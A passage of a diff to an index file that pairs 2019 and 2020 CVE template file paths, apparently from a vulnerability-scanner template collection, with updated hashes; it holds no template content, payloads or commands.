-http/cves/2020/CVE-2020-11547.yaml:91ecca576de5894d4c5ab88b7aaf9fb3669342fe -http/cves/2020/CVE-2020-11710.yaml:991649dd773cb62ac05adb4a4e24642e7e4363ca -http/cves/2020/CVE-2020-11738.yaml:8b0f4050ead619ec6d50fddbe0bfc322f740c5d7 -http/cves/2020/CVE-2020-11798.yaml:f0cb20450dfafacb511603506d5917697d7e350b -http/cves/2020/CVE-2020-11853.yaml:6d65507e4af4649fdbfb32412e96d0ce8294fcf9 -http/cves/2020/CVE-2020-11854.yaml:2feb2a2b9e5e0cd6271af4d14939ccc4e00bd7c7 -http/cves/2020/CVE-2020-11930.yaml:f68dff2f9fdd2ebec293f190ef7ddc40cbf98c02 -http/cves/2020/CVE-2020-11978.yaml:234371bf548d02d60c0e6da7a5410ca936667cea -http/cves/2020/CVE-2020-11991.yaml:3acd8956501fab925590c70df0528cf3af159b16 -http/cves/2020/CVE-2020-12054.yaml:3cbf532358dd4ea81cacb3b54e596b2d049e65cd -http/cves/2020/CVE-2020-12116.yaml:d6d2a0838739edcd1c461baf8e99842a8f9951d4 -http/cves/2020/CVE-2020-12124.yaml:562acb6cef29d9986cd7691af77999810ad919e7 -http/cves/2020/CVE-2020-12127.yaml:2c32548ba60d92574187dd031cedc7e442df676f -http/cves/2020/CVE-2020-12256.yaml:9aa59754115f53455a2ea55a6ce1f81026ef09d1 -http/cves/2020/CVE-2020-12259.yaml:b9f83a08e7332a8e03b7f9d165f000f04a9f73d1 -http/cves/2020/CVE-2020-12447.yaml:356cbbbf90180f0ad552fe39d72681a4195e4be9 -http/cves/2020/CVE-2020-12478.yaml:723b2d2ad40f47c11529a95653807b28e329e6f2 -http/cves/2020/CVE-2020-12720.yaml:e216d90a79688b2ffb23b111b7849b198b06b9e7 +http/cves/2019/CVE-2019-16920.yaml:98f53598fa2b4a4d4c519324e1f05142b23910d2 +http/cves/2019/CVE-2019-16931.yaml:9bea4a17832834b7371af4572226339afa3df707 +http/cves/2019/CVE-2019-16932.yaml:0b0ee449902afe7b0715afd25e478c74175fa3cc +http/cves/2019/CVE-2019-16996.yaml:a2ba18f13b03d94929e7f6c8c71ff27fd1eb769e +http/cves/2019/CVE-2019-16997.yaml:0b256401e26d97fa0bc924da4d7cc9d867181b1a +http/cves/2019/CVE-2019-17270.yaml:a692c526b647c7ef6b9702d67d44fcfcd3a41ed7 +http/cves/2019/CVE-2019-17382.yaml:995ade2d22bc11b2c793341f5ac6c3c71ac76d14 +http/cves/2019/CVE-2019-17418.yaml:c7d5ecd46075327d2991913272d2afed90feb256 +http/cves/2019/CVE-2019-17444.yaml:ac7bbbe3993bfd26985de37a379dd77a3ea47ffc +http/cves/2019/CVE-2019-17503.yaml:ebf41af37aaf309f4edacc70630306ca144fe578 +http/cves/2019/CVE-2019-17506.yaml:f3cb2cedff29c6604a25020b87fa35233d2efd22 +http/cves/2019/CVE-2019-17538.yaml:6b1f4e4f5e75b1912bebc5f13b7da398432ab1b9 +http/cves/2019/CVE-2019-17558.yaml:5a49febe3cf7269de9757114fbe6aeb7936f2977 +http/cves/2019/CVE-2019-17574.yaml:6b885f62e5b0e30a05a98f49f857702c1f913659 +http/cves/2019/CVE-2019-17662.yaml:4afdb4e50322105a8105f2e1b4617d1debc280d1 +http/cves/2019/CVE-2019-1821.yaml:7a411a009f8ed4db14b3388a553061fddf3d7519 +http/cves/2019/CVE-2019-18371.yaml:6d7b47fca0e1d8dc637506eedef10c98cec93b47 +http/cves/2019/CVE-2019-18393.yaml:badf26c959496ab1e1d994ee13f97f888a544440 +http/cves/2019/CVE-2019-18394.yaml:fa7b54002fbf1a2bf8ac9887b6aacb03dc70cebe +http/cves/2019/CVE-2019-18665.yaml:2afd653213d013cbfd1de83c9fbdc4d3e724fc0c +http/cves/2019/CVE-2019-18818.yaml:f54eff544779d6ac4f5f9e629942b66acf2e6e65 +http/cves/2019/CVE-2019-18922.yaml:94dcebdf8418a8e59f829c1ea39026f6c2169b36 +http/cves/2019/CVE-2019-18957.yaml:2f8ca9bc00e59f1550e830b8f2447e0db8499be0 +http/cves/2019/CVE-2019-1898.yaml:9212f6f513a8f4abcb2ee3ff1441786a80333c23 +http/cves/2019/CVE-2019-19134.yaml:542338f40c23ad7970fc88e2678089083d7f5c3e +http/cves/2019/CVE-2019-19368.yaml:59d78c3c39ce785422f65bf6d64c4bc595195f6e +http/cves/2019/CVE-2019-1943.yaml:007006046b3faced0360af0298c0b2dcea16c23f +http/cves/2019/CVE-2019-19781.yaml:b541bfbdbaf3d9c7b52db32a46f06c01a586cba0 +http/cves/2019/CVE-2019-19824.yaml:27d213cf280481b1a9366b8a146cc28bdf1de2e8 +http/cves/2019/CVE-2019-19908.yaml:ab389ce3475e9f470f86f560acad88565e0ef07f +http/cves/2019/CVE-2019-19985.yaml:dc904d02fcdf2438119fdd07d3d922d669bcb120 +http/cves/2019/CVE-2019-20085.yaml:378b260f9f49882d46a31c6dc74b3dda9c09b267 +http/cves/2019/CVE-2019-20141.yaml:1f90884daec6c8dc6afaa661290212c4882c1395 +http/cves/2019/CVE-2019-20183.yaml:d526e0f112e15dd7c942a3cba3ec4ec8a5684aae +http/cves/2019/CVE-2019-20210.yaml:29eaaa950aaaacda5c4d13df7fa99f947a97bf6c +http/cves/2019/CVE-2019-20224.yaml:855038208d15e33d1a70325425928d78e8321e85 +http/cves/2019/CVE-2019-20933.yaml:8c2511eefeb18d8b696ae024c2ca6f5b92ba0892 +http/cves/2019/CVE-2019-2578.yaml:35159d7d41fa76dc3aa996e3b7db46d82c847769 +http/cves/2019/CVE-2019-2579.yaml:29dcff58cd105f2260dea0f8c3736e065db412a8 +http/cves/2019/CVE-2019-2588.yaml:243ffd2a98829ba0c8586d2892a79ed75d7a1c82 +http/cves/2019/CVE-2019-2616.yaml:1aece47f9183e9ab78afd6568dceac87e6ce0e3f +http/cves/2019/CVE-2019-2725.yaml:d59aee5e170352c6ad327037e542cad2db715c88 +http/cves/2019/CVE-2019-2729.yaml:b80ab3a69e80e8266cfe303a92b95e456556e2f9 +http/cves/2019/CVE-2019-2767.yaml:7ff36a1227175388388557c8c5dabd25ed8dd711 +http/cves/2019/CVE-2019-3396.yaml:5e3927968a194c1896bb63f2152bf9811dd499cd +http/cves/2019/CVE-2019-3398.yaml:7947b84a156a243ab4b53c84c41d79bd120d45a6 +http/cves/2019/CVE-2019-3401.yaml:740dc43c8289b4b1e8a77dedf6b20b02f2c3ea29 +http/cves/2019/CVE-2019-3402.yaml:9556ae84e8aa5dd668c27ec64151344d16098924 +http/cves/2019/CVE-2019-3403.yaml:9e03fcf6d4f93540bae6848ef9d35146a9eee4b6 +http/cves/2019/CVE-2019-3799.yaml:d086e8f0af6a27103f0fabdf276161fa80d7d683 +http/cves/2019/CVE-2019-3911.yaml:069e9382fc3b90c57e391f62eb878b6487d009d2 +http/cves/2019/CVE-2019-3912.yaml:0aa8884a60e81c6e23afa2fab4845fa383baa3fe +http/cves/2019/CVE-2019-3929.yaml:7bb5888355b659c9c1619e0264b65943299e8164 +http/cves/2019/CVE-2019-5127.yaml:667c4f77cd9d027ee14c6cad7960f7d771e80fbc +http/cves/2019/CVE-2019-5418.yaml:1a581d39830b4afe2a7e6df4240fcc6813a65018 +http/cves/2019/CVE-2019-5434.yaml:a5409c412dfae15c795ff7ce22e4da30bb41ae2b +http/cves/2019/CVE-2019-6112.yaml:615c3b66ae1b9257d3ce1de50054c67c1fd66f04 +http/cves/2019/CVE-2019-6340.yaml:66058f8cdf6995c1c62b08f76b72f11ca0561132 +http/cves/2019/CVE-2019-6715.yaml:1f25aaeed48242b93f6d7316894506dd256c5635 +http/cves/2019/CVE-2019-6799.yaml:732c8cfd7ede17c3300e53ac08bd1638b5d0e438 +http/cves/2019/CVE-2019-6802.yaml:637f6afb3734afd118073dfc323a2467cd08d11b +http/cves/2019/CVE-2019-7192.yaml:91f282c39866090e9588e9edffa7b015cc389ab8 +http/cves/2019/CVE-2019-7219.yaml:7f45ba6825e9b787b95e2dcf88925016bf8a2d41 +http/cves/2019/CVE-2019-7238.yaml:cd43596c779ae1d0fdbb6be71c8e7dbb764dca25 +http/cves/2019/CVE-2019-7254.yaml:055c44c403c284a1ca1abdd9d8ec1f586241fdcb +http/cves/2019/CVE-2019-7255.yaml:f59286cb945ddb753cf14dbc611847552592d5af +http/cves/2019/CVE-2019-7256.yaml:1537ab7769d1a65c402bbadb7b6141113f6a4c9b +http/cves/2019/CVE-2019-7275.yaml:6c663d46d14a13a156ef670637db54b7e99afa68 +http/cves/2019/CVE-2019-7315.yaml:e961b6fe9b8541f4f7f25d43fc691e1515fc72cc +http/cves/2019/CVE-2019-7481.yaml:eef99ad8ad9d1fb8436d130f92cd5d97599aec71 +http/cves/2019/CVE-2019-7543.yaml:56b4ceafd7c0996f4142005ddc796d69c9420a3d +http/cves/2019/CVE-2019-7609.yaml:8e7cfee252e8e8a384a7e3ddb33fcb1a752db4f1 +http/cves/2019/CVE-2019-8086.yaml:2db0bcdac19405676e9c8dbc37f9dd2f12d44287 +http/cves/2019/CVE-2019-8390.yaml:858179a8f463d5ad5052a9e78142dd37ea1b9106 +http/cves/2019/CVE-2019-8442.yaml:a26c7c4a8f15f62f2058ff6a2e98a8d2270c4bb5 +http/cves/2019/CVE-2019-8446.yaml:727b9776f275ffdfd2994c8aaa31aaa977568a41 +http/cves/2019/CVE-2019-8449.yaml:681fa21bf8cf25371d872adf82672ed171e41adf +http/cves/2019/CVE-2019-8451.yaml:e5812f05ac929ec7eed4e11ab7702c35ce56a5ab +http/cves/2019/CVE-2019-8903.yaml:29df7652eb3657371e8981f33f0004d6bbbb2f5b +http/cves/2019/CVE-2019-8937.yaml:529234069ffd41ae0d854b8ad9d9061288faf141 +http/cves/2019/CVE-2019-8982.yaml:3356e2e6cd8f49b1256a6ce3e866b24477a5dbe0 +http/cves/2019/CVE-2019-9041.yaml:1b79bf05f6c73e91e58cdeac685bed239cc73ed6 +http/cves/2019/CVE-2019-9618.yaml:23345e733a4f58f837a975c8abe1349299c751e5 +http/cves/2019/CVE-2019-9670.yaml:b7e1441675a155cb25f27e3698d5071c86f9e0a8 +http/cves/2019/CVE-2019-9726.yaml:9c582cbdfb9452655e048ef21f91894002a90aba +http/cves/2019/CVE-2019-9733.yaml:0c8f56f9e231d2c32b099e3ea165d245961cd024 +http/cves/2019/CVE-2019-9915.yaml:af5bfdd59ce51d93e8985830434066e2c3466971 +http/cves/2019/CVE-2019-9922.yaml:e864211ab0bf4764d1ae1c8d05ce63b1a049520c +http/cves/2019/CVE-2019-9955.yaml:157262f101e1c9a616379624dfa9644c98ef9052 +http/cves/2019/CVE-2019-9978.yaml:6d4717f0c8ac68b4cb9ab64c899861f7cf839d7f +http/cves/2020/CVE-2020-0618.yaml:a083692e13a59fed14b1842ec98f9277b46a8a73 +http/cves/2020/CVE-2020-10148.yaml:8a1385afd0d56ada9fc05247cc1af5c04bdc1da1 +http/cves/2020/CVE-2020-10199.yaml:eff98f8bba9cfe4fcc2eea8b08822c2c18f40561 +http/cves/2020/CVE-2020-10220.yaml:e95a7fae557ee714b338a34bb26a2145eb17c58d +http/cves/2020/CVE-2020-10546.yaml:92308eb57a9a4c8fb20c67fcb646ddeec0a7e014 +http/cves/2020/CVE-2020-10547.yaml:7ccd685791f9da4e9679361450afb3783599a82b +http/cves/2020/CVE-2020-10548.yaml:1dedf64c7bc340e16ecef615a26e7fa7473b5721 +http/cves/2020/CVE-2020-10549.yaml:9461b5352d4c7e4431ecfdcd8d3776b7bfdae243 +http/cves/2020/CVE-2020-10770.yaml:e7ef7586ad488fffc5db9096e7650d85fd2f2fd4 +http/cves/2020/CVE-2020-10973.yaml:eb52af063a6df564b76eaa570cf804a8b2beb7b6 +http/cves/2020/CVE-2020-11034.yaml:f8ad77b157d5093de314e6859da3d71242f01f25 +http/cves/2020/CVE-2020-11110.yaml:73de4db4f0c3087ab0d4fbc95c8c046ac0ed543d +http/cves/2020/CVE-2020-11450.yaml:e759250299d1a678b397016cbd50b7646a542150 +http/cves/2020/CVE-2020-11455.yaml:bd0289775e6451a4ca0ac73b2b80275d50e8aeef +http/cves/2020/CVE-2020-11529.yaml:ddb7274f702e3469ee7dd6faab0bc1dd420b35ef +http/cves/2020/CVE-2020-11530.yaml:b133fe110f94bf2b75067969523e5c870f24ff4b +http/cves/2020/CVE-2020-11546.yaml:8eef26a1651d00b4d86b7ae82cd0859580850e0c +http/cves/2020/CVE-2020-11547.yaml:b33304d93793f59e8b3160963d38f8383b9e1065 +http/cves/2020/CVE-2020-11710.yaml:873d4851fdd8148440857f073f432d5c6074ad95 +http/cves/2020/CVE-2020-11738.yaml:f160e6d772cae89bc72cc336d4bd778aff817c70 +http/cves/2020/CVE-2020-11798.yaml:0d4e359cbd5595a40ebee8754d965c783ea88ae9 +http/cves/2020/CVE-2020-11853.yaml:f82db9310a3c2f03c3f776ff090806133aed8acb +http/cves/2020/CVE-2020-11854.yaml:e6e425f749982d52bf5bcd0254d7ab19435ab38b +http/cves/2020/CVE-2020-11930.yaml:cff6e58071a0134d0f5602db6d61d8372ec208a1 +http/cves/2020/CVE-2020-11978.yaml:27ee6d1912988237f457a02908141af4b1b0fc6a +http/cves/2020/CVE-2020-11991.yaml:3ace02c9b8de4bc6fdf312c62c6f37f4786fc9f9 +http/cves/2020/CVE-2020-12054.yaml:1a2d65cd59d466a66bd27bebf16a39c3cfe5a32c +http/cves/2020/CVE-2020-12116.yaml:1dfbd8571490008e93220bac0399b7961ad7ad0e +http/cves/2020/CVE-2020-12124.yaml:e80226c2023e46fa610459373bdf10ecb5eb8c9a +http/cves/2020/CVE-2020-12127.yaml:a3971d98e0a835ddccdc0ad360416a55bcce9ab9 +http/cves/2020/CVE-2020-12256.yaml:2bebfac88ee9974e4242c190c7ee136048abc317 +http/cves/2020/CVE-2020-12259.yaml:5ea288a87fcf2e76eda7eeb0ef88759d41c68d70 +http/cves/2020/CVE-2020-12447.yaml:e299e60745d9a7856f9657a39aec3bb8925f97ac +http/cves/2020/CVE-2020-12478.yaml:7dfce023340f15e3421742b22918ea354752648c +http/cves/2020/CVE-2020-12720.yaml:4d2cf2d7dec52f4c9faf18a65a2ac56eb9fcae0c http/cves/2020/CVE-2020-12800.yaml:b1d8d42f3b913b10104a9869c70e9bfb811d664e -http/cves/2020/CVE-2020-13117.yaml:0bd953806df66ce10a00b8705c016d16c662a141 -http/cves/2020/CVE-2020-13121.yaml:fe7412d720bfa87668fcc36a10ec76272dba4657 -http/cves/2020/CVE-2020-13158.yaml:8a4c9c2e053c61f11ef4d2069c4b51257f560574 -http/cves/2020/CVE-2020-13167.yaml:a231ff8eba911412a01984712f777b426fc0b98c -http/cves/2020/CVE-2020-13258.yaml:5dc33bd6020a52314b5982b582cda89513ded110 -http/cves/2020/CVE-2020-13379.yaml:4b4e5245dd3e7a02b33ee241a7387462a8cce67a -http/cves/2020/CVE-2020-13405.yaml:b78c59c019bbb82be849426d99300be040921036 -http/cves/2020/CVE-2020-13483.yaml:204827fc6e4a65f327670a4393dd550a9a57bad1 -http/cves/2020/CVE-2020-13638.yaml:dc38a545915ecf42c7365d3000d2d78e9aec4cc6 -http/cves/2020/CVE-2020-13700.yaml:5b771f47b89e398efd5b5f9dc61daae0f144ffff -http/cves/2020/CVE-2020-13820.yaml:f448b4029e29a253b5ac39901726155d64d94194 -http/cves/2020/CVE-2020-13851.yaml:7ec7322b7ac1e0cd639067f983d3bb645ed9961a -http/cves/2020/CVE-2020-13927.yaml:762e063bde67e464349432ffe3e30ca7823a2753 -http/cves/2020/CVE-2020-13937.yaml:6e37600c53bb9c7aaf1bad70036f60953bb36abe -http/cves/2020/CVE-2020-13942.yaml:dee94c4d198365847995cb963d452aea43e63760 -http/cves/2020/CVE-2020-13945.yaml:98abfeb5077d8115a5df38c65849baaa43f8372d -http/cves/2020/CVE-2020-14092.yaml:9b8478ed79a7f4f1b1b1034386d63260fd82f00a -http/cves/2020/CVE-2020-14144.yaml:6ee754fb3709a24e64585db70695f6b5acf6c7f6 -http/cves/2020/CVE-2020-14179.yaml:82cd682b8bdf8317e0ce40132b53f52cb3c46c74 -http/cves/2020/CVE-2020-14181.yaml:6468538f7135bc9c389c99e6aa65a6bef138f165 -http/cves/2020/CVE-2020-14408.yaml:84b10bfe8b3bc111eb2d9e5a1e4dfb2c2485d55e -http/cves/2020/CVE-2020-14413.yaml:92bbebe86c8d33ae2214c3321499ccd574261084 -http/cves/2020/CVE-2020-14750.yaml:0acadd031a313d1fe79ba28deb1939808ec9d110 -http/cves/2020/CVE-2020-14864.yaml:4285e842de0b494315fb7116649c1d93acde25bc -http/cves/2020/CVE-2020-14882.yaml:1797495be1f1c341caa0b4df656fd8cc7e1375af -http/cves/2020/CVE-2020-14883.yaml:b5aa869870a711ee5350896e698d2e041b89275c -http/cves/2020/CVE-2020-15050.yaml:fbaedbc599fb6e48305c1a5af2f32e4c37e03ebc -http/cves/2020/CVE-2020-15129.yaml:a0effe7b5900920bafa8d8cc5d677140da826226 -http/cves/2020/CVE-2020-15148.yaml:4645ef9e913056ec476a9aa96c6fb8b5af4b3dca -http/cves/2020/CVE-2020-15227.yaml:ea0471623ed2c763514e041831ab558360cd9641 -http/cves/2020/CVE-2020-15500.yaml:050ba10ecfa32c5267812badd17e5e14369eddec -http/cves/2020/CVE-2020-15505.yaml:c0790c24e1b111b1d47164dfe95040a43ec04fd3 -http/cves/2020/CVE-2020-15568.yaml:f2f73492067ae95761efb45ba9cb1c687f7bc83c -http/cves/2020/CVE-2020-15867.yaml:129f15a4f19266446fe9fc95f3a977e9059c01fb -http/cves/2020/CVE-2020-15895.yaml:466c4eed2b5caa1ab35eda70551d67866631f43b -http/cves/2020/CVE-2020-15920.yaml:31fbc13d59d3f649040d4794931914edf9fe999b -http/cves/2020/CVE-2020-16139.yaml:7780259f2c70a7c368c178755bc72490499e60e7 -http/cves/2020/CVE-2020-16846.yaml:f34d977fc9cddbe448f012b98a5c7850b4f32f43 -http/cves/2020/CVE-2020-16952.yaml:4a0ad0a51365fa6c815006f5bec8b5297de0c0e2 -http/cves/2020/CVE-2020-17362.yaml:97caf91b5c62e424536fabd32531830f3ff640d7 -http/cves/2020/CVE-2020-17453.yaml:a09273da97cb74c21c66c8bdc8f173bc3048477e -http/cves/2020/CVE-2020-17456.yaml:4049d71e01bfce887310ac203e941f3bb276ee88 -http/cves/2020/CVE-2020-17463.yaml:eece4d2fd331fa5bb84915eec9c6c2878eb3acbf -http/cves/2020/CVE-2020-17496.yaml:6d5cbfd64ca54cf5afbf96b32caffd7af6d6f2ed -http/cves/2020/CVE-2020-17505.yaml:091c89dc08c32c1c88c7ba765fe0b87735b6821c -http/cves/2020/CVE-2020-17506.yaml:e012d044343da330f1336fb322cdf25e52406d80 -http/cves/2020/CVE-2020-17518.yaml:911985a59b6c9ca6a7300b9dba999df2fdb124c5 -http/cves/2020/CVE-2020-17519.yaml:2ebfbf4f78345e311a70f117a9fafe60dc220c00 -http/cves/2020/CVE-2020-17526.yaml:e2f001d06badce54f710b78bf78c68fa903bd8b4 -http/cves/2020/CVE-2020-17530.yaml:dbc6b7f0222cdcf72ff401825e36043f789f7a61 -http/cves/2020/CVE-2020-18268.yaml:78de778af7897708e3f43ee584df19e5492bf6c5 -http/cves/2020/CVE-2020-19282.yaml:f22df1974b4682a68ffeec6df03d1577cb068a37 -http/cves/2020/CVE-2020-19283.yaml:ed9624895f1f6dc952d53d879ba40effd4a7751b -http/cves/2020/CVE-2020-19295.yaml:1c67b24a147bc78fc9b697ca9e870bf663d2cba6 -http/cves/2020/CVE-2020-19360.yaml:be34141c317be159d85c9765b20550badd289485 -http/cves/2020/CVE-2020-1943.yaml:20e1354acdfe3b6372611b711f32add2fbbcd4f9 -http/cves/2020/CVE-2020-19515.yaml:07cfc8b4a904e22810a110871daf767307240774 -http/cves/2020/CVE-2020-1956.yaml:e8a1101cbbe8ccca1dd602fdad4ea467ced06bce -http/cves/2020/CVE-2020-19625.yaml:13b579cd8c04dc69456c2fcf73b6e732e0687353 -http/cves/2020/CVE-2020-20285.yaml:a5f328cb32163d0856ad4cb8c60a77dca8ee8208 -http/cves/2020/CVE-2020-20300.yaml:66d8b44e52fd414ab2277a70c309bbb10c1a510f -http/cves/2020/CVE-2020-2036.yaml:f9d28c4106c2f329486d2200bd7673971fed39ca -http/cves/2020/CVE-2020-2096.yaml:a545411a4f68a69a742e0454acb49626500b9191 -http/cves/2020/CVE-2020-20982.yaml:04856395f5308ad62fbebcf2e9b20b5abd5a0f0e -http/cves/2020/CVE-2020-20988.yaml:96917b468467ab2b4a2feb6e0aa9b464a57b8637 -http/cves/2020/CVE-2020-21012.yaml:320a788aff7bd642f8a5cbcddc0c505bfad7103c -http/cves/2020/CVE-2020-2103.yaml:82b763971f9935e2acb21023056f3ce6a9be9252 -http/cves/2020/CVE-2020-21224.yaml:682c0c2ebc86097705eb0b43a2f9f1e34dd91e10 -http/cves/2020/CVE-2020-2140.yaml:fd2219f7835bfc5436415cdc1fcccf66dc287e90 -http/cves/2020/CVE-2020-22208.yaml:3af9f94547a4d2bcf930e6498f45590e01642c03 -http/cves/2020/CVE-2020-22209.yaml:99d897370d390eb460f23eb5440ffd9f200de18c -http/cves/2020/CVE-2020-22210.yaml:768347abab26b8fe25c9f1f667c3a2eb3555a4e8 -http/cves/2020/CVE-2020-22211.yaml:e9956dba2a7056b3617436aa5078dfc485a52547 -http/cves/2020/CVE-2020-22840.yaml:420622f1ca0aedde2e5bd07338c5b89e1ac93226 -http/cves/2020/CVE-2020-23015.yaml:6977650019929dcf6fc9ddb17fd8cb1af896e245 -http/cves/2020/CVE-2020-23517.yaml:ed5cbebedf829b3ed16a8192bfa40d2b112501bd -http/cves/2020/CVE-2020-23575.yaml:f9911f08788bc1468b843707933df9a581d58818 -http/cves/2020/CVE-2020-23697.yaml:944df39f6f85438e05487c0c0c29c00ab217b37d -http/cves/2020/CVE-2020-23972.yaml:0575d4d24e693ad88cdcdb6d15255cd4864662d0 -http/cves/2020/CVE-2020-24148.yaml:9575150d87027b3bd458e31e5c794710856c206e -http/cves/2020/CVE-2020-24186.yaml:8acbf1e7d3e7923234ae863e7db65271a1f3a561 -http/cves/2020/CVE-2020-24223.yaml:419c0e1507478ad04de551e90dc7b6233462ade3 -http/cves/2020/CVE-2020-24312.yaml:a6aa3513c932f2efb2dbdcca7de811945361d4d7 -http/cves/2020/CVE-2020-24391.yaml:19ae10db46dfe19b5c5d6386ebdaf4ea04ca7626 -http/cves/2020/CVE-2020-24550.yaml:065fd5d739562d63ee6e850d7e001c5cc45d0c80 -http/cves/2020/CVE-2020-24571.yaml:04b0a58bc94153c9b28510212d7fc8de92c945b2 -http/cves/2020/CVE-2020-24579.yaml:3888f0dcc3f95a644e263fab8044915c9f2fb852 -http/cves/2020/CVE-2020-24589.yaml:a2a8675cf04d65079295facbfedfdb11ac17c083 -http/cves/2020/CVE-2020-24701.yaml:90331891e5e1e2d4ea2b7e5e2aa65a26246a7193 -http/cves/2020/CVE-2020-24902.yaml:67ccd15828b2b24660eec8d34d96609216121e2e -http/cves/2020/CVE-2020-24903.yaml:35c594f2ae420b5e62f6649710c8766a6df375b1 -http/cves/2020/CVE-2020-24912.yaml:5fb76e6d3926661a202f5c4e707af2104ec95923 -http/cves/2020/CVE-2020-24949.yaml:3dfbe46b4215db70fee640b32076c420e4d231cd -http/cves/2020/CVE-2020-25078.yaml:db9584fa19f05f14c1b7b4ffaaa05d104d5a08e7 -http/cves/2020/CVE-2020-25213.yaml:12ab4d983b918bd404ab3cd5acea2afd533fe727 -http/cves/2020/CVE-2020-25223.yaml:77a319ebc05e63a5075f131fb0e49506a82227ae -http/cves/2020/CVE-2020-25495.yaml:c6d6550b0f2c98aaec216223098e22ff410192ad -http/cves/2020/CVE-2020-25506.yaml:86258b984cb1548454b262f8663fb5242ee7aa4f -http/cves/2020/CVE-2020-2551.yaml:7ee0b41c327dd2ad6a3b43d800b40221daba4393 -http/cves/2020/CVE-2020-25540.yaml:7d44e71887d3633b6c348e8cb2dfb741c6de74bc -http/cves/2020/CVE-2020-25780.yaml:ea63d27e36daa6ef6f8d1ea7bf111fc47a9f32c2 -http/cves/2020/CVE-2020-25864.yaml:944d9a8e1e54965fd46c513a7413fa13509f4a78 +http/cves/2020/CVE-2020-13117.yaml:6779d67ffbaeef402a0925a450a126be8f52de39 +http/cves/2020/CVE-2020-13121.yaml:98c447cc5645bbbbd249be91bef89d39ca2055bb +http/cves/2020/CVE-2020-13158.yaml:e3c7a2eaccd786813848f6610b6b820affe92c42 +http/cves/2020/CVE-2020-13167.yaml:fe0846f2fa5bde2f093d479a5513a5d44227f152 +http/cves/2020/CVE-2020-13258.yaml:65cf03558c36501490d87f566a8ae667f0b41907 +http/cves/2020/CVE-2020-13379.yaml:421bffa56a7c7c4d8f45696fcc21eabd41febe9e +http/cves/2020/CVE-2020-13405.yaml:c63f13d5224b9be4441c790c27fd3ae135b40fbe +http/cves/2020/CVE-2020-13483.yaml:8322642cdbceca290930903c551074db244c4bb2 +http/cves/2020/CVE-2020-13638.yaml:a7db090f675b2710f8baaae4a3b5766faddd1aef +http/cves/2020/CVE-2020-13700.yaml:b0b00627ddc2b8c5e77883e20ff0785efab63bd3 +http/cves/2020/CVE-2020-13820.yaml:ee2545d624e809fe4c11f43e21d806dcf63cc3e0 +http/cves/2020/CVE-2020-13851.yaml:21c3c0512820967981721dc633ea165b32e89617 +http/cves/2020/CVE-2020-13927.yaml:b0ed6c0946debd5c661de52218eafb09aaa7d38d +http/cves/2020/CVE-2020-13937.yaml:b44999895976484ca4e6d8f2d5d6994ac483b750 +http/cves/2020/CVE-2020-13942.yaml:42882cc2520ff174fd57620485bcca64bda6861c +http/cves/2020/CVE-2020-13945.yaml:662f5a8776bc6d94b72229050a89df294eff7bcb +http/cves/2020/CVE-2020-14092.yaml:c6db4075388abd1889c4538563762441d4cd26d2 +http/cves/2020/CVE-2020-14144.yaml:06ea0d43f0e887ef41500544fe4b35eff04455ed +http/cves/2020/CVE-2020-14179.yaml:fdd64fb6bdee12ead3d93b7d278571058d1ed6b8 +http/cves/2020/CVE-2020-14181.yaml:ba09a2c366fa2b957c235fb4d35eba2a1a78cb49 +http/cves/2020/CVE-2020-14408.yaml:b9e9869c16731d6497d2dfc9635432db9c41e966 +http/cves/2020/CVE-2020-14413.yaml:c35c53c94b536a5fd5f1c7428266e43e823afb94 +http/cves/2020/CVE-2020-14750.yaml:aa01a8bac2a9f3be6c1d2f54cf124af8d0deb6b1 +http/cves/2020/CVE-2020-14864.yaml:661ea62363cdfdf9af25d1c87668149221fe6c7a +http/cves/2020/CVE-2020-14882.yaml:8b48d417419f4c496710e30f6991f072b3707ba6 +http/cves/2020/CVE-2020-14883.yaml:6adce8e6eaed71941889739910b6d28a6150a93e +http/cves/2020/CVE-2020-15050.yaml:91c1e45e21c374b638f037a2eaa107ceb605a7d7 +http/cves/2020/CVE-2020-15129.yaml:8bc5b4a6dfb374c5b3864c9b8a4901071719fe44 +http/cves/2020/CVE-2020-15148.yaml:98a27ddebe992b3232252e3a374652c4dd4935b5 +http/cves/2020/CVE-2020-15227.yaml:2c24258a451371070daab40de4cf3b79f84aa1dc +http/cves/2020/CVE-2020-15500.yaml:f4f57926dd5a1b16344674271f6a33213d2f991d +http/cves/2020/CVE-2020-15505.yaml:5fc6fee92955d84fe40e4ba4141301432940616a +http/cves/2020/CVE-2020-15568.yaml:e383df0fe859e80806ec1babff2caf0647f4172e +http/cves/2020/CVE-2020-15867.yaml:588f78f46d44ba5cf13e848fcb49a6649ec4aeee +http/cves/2020/CVE-2020-15895.yaml:ef61ed6c8badf027401d25780a229838b02973b0 +http/cves/2020/CVE-2020-15920.yaml:e9390319cc2fdbe826fd947ecf728c00eda634e4 +http/cves/2020/CVE-2020-16139.yaml:c946d3977e6685569626b821f03dc126f29afd38 +http/cves/2020/CVE-2020-16846.yaml:7d5c222d2e6b92b129a544348b11436a491d5125 +http/cves/2020/CVE-2020-16952.yaml:d5d34639a8343908a1389fb22fad954cce839108 +http/cves/2020/CVE-2020-17362.yaml:2bf423ce306e61cbb41a51007dcf2453978546c2 +http/cves/2020/CVE-2020-17453.yaml:1aaae3ebc53550af1b372f9cb55e1d811dca170d +http/cves/2020/CVE-2020-17456.yaml:4234b942676b727f50d2b39f7536744b3184b461 +http/cves/2020/CVE-2020-17463.yaml:fdbbc8d07259830262c8702c0c218adf761db94b +http/cves/2020/CVE-2020-17496.yaml:a0b1aeaff34a3043b0a385e9f18ed5081d5a152d +http/cves/2020/CVE-2020-17505.yaml:97e34a50c8c0e94cbaaf530ce15c2f8c6b600a0b +http/cves/2020/CVE-2020-17506.yaml:1f10cc0f9fcdb42c4b7a290008127c702cf136a0 +http/cves/2020/CVE-2020-17518.yaml:86429914a137b5a83d93210d4eb4f4971753822a +http/cves/2020/CVE-2020-17519.yaml:bce34de33c673650930c5acc024c49a090302238 +http/cves/2020/CVE-2020-17526.yaml:c7dd5833f17dabe0431c0f5b23b8f9b4712e4e10 +http/cves/2020/CVE-2020-17530.yaml:96edbf6b20f1de318bcb4f155016e728f147f110 +http/cves/2020/CVE-2020-18268.yaml:5d623da63e6ffaf2f8f04681643bce7b1233981e +http/cves/2020/CVE-2020-19282.yaml:8e0a54a38308b81c11b7d5e158f0bdbf27f82d75 +http/cves/2020/CVE-2020-19283.yaml:01f8bf8922e59857aefa263bbf61511291917c50 +http/cves/2020/CVE-2020-19295.yaml:e0902a1f4cebc688796d5bf399a4eb8cf4a391f4 +http/cves/2020/CVE-2020-19360.yaml:a9af53803dae247ab969d6400cb125107572d58b 